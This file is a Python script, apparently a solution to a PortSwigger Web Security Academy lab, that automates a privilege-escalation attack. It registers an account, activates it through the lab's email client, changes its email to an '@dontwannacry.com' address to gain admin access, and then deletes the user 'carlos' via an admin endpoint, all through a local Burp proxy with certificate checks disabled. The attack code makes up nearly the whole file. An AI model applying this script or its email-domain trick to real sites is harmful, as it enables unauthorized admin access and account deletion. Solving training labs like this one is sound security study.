1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
| from bs4 import BeautifulSoup
from urllib.parse import urlparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class SiteInteraction:
def __init__(self, base_url, proxies=None):
self.base_url = base_url
self.session = requests.Session()
self.session.proxies = proxies if proxies else {}
def get_csrf_token(self, url):
response = self.session.get(url, verify=False)
soup = BeautifulSoup(response.content, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrf'})['value']
return csrf_token
def get_email_url(self):
response = self.session.get(self.base_url, verify=False)
email_client_url = BeautifulSoup(response.content, 'html.parser').find('a', {'id': 'exploit-link'}).get('href')
return email_client_url
def register(self, username, password):
register_url = self.base_url + '/register'
csrf_token = self.get_csrf_token(register_url)
emailhost = urlparse(self.get_email_url()).hostname
data = {
'username': username,
'email': username + '@' + emailhost,
'password': password,
'csrf': csrf_token
}
response = self.session.post(register_url, data=data, verify=False)
return response
def email_activation(self):
response = self.session.get(self.get_email_url(), verify=False)
soup = BeautifulSoup(response.content, 'html.parser')
activation_link = soup.find('a', href=True, string=lambda text: text and "temp-registration-token" in text)['href']
activation_response = self.session.get(activation_link, verify=False)
return activation_response
def login(self, username, password):
login_url = self.base_url + '/login'
csrf_token = self.get_csrf_token(login_url)
data = {
'username': username,
'password': password,
'csrf': csrf_token
}
response = self.session.post(login_url, data=data, verify=False)
return response
def update_email(self, new_email):
user_url = self.base_url + f'/my-account?id={username}'
change_email_url = self.base_url + '/my-account/change-email'
csrf_token = self.get_csrf_token(user_url)
data = {
'email': new_email,
'csrf': csrf_token
}
response = self.session.post(change_email_url, data=data, verify=False)
return response
def delete_user(self, username):
admin_delete_url = self.base_url + f'/admin/delete?username={username}'
response = self.session.get(admin_delete_url, verify=False)
return response
# Example usage:
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
url = 'https://0a4400b5047397ff8067d59100b100bd.web-security-academy.net'
site = SiteInteraction(url, proxies=proxies)
username = 'bug-hunter'
password = 'P@7sW0)d'
new_email = username + '@dontwannacry.com'
# Register a user
registration_response = site.register(username, password)
print("Registration response:", registration_response.status_code)
# Activate email
email_activation_response = site.email_activation()
print("Email activation response:", email_activation_response.status_code)
# Login
login_response = site.login(username, password)
print("Login response:", login_response.status_code)
# Update email
update_email_response = site.update_email(new_email)
print("Update email response:", update_email_response.status_code)
# Delete user
delete_user_response = site.delete_user('carlos')
print("Delete user response:", delete_user_response.status_code)
|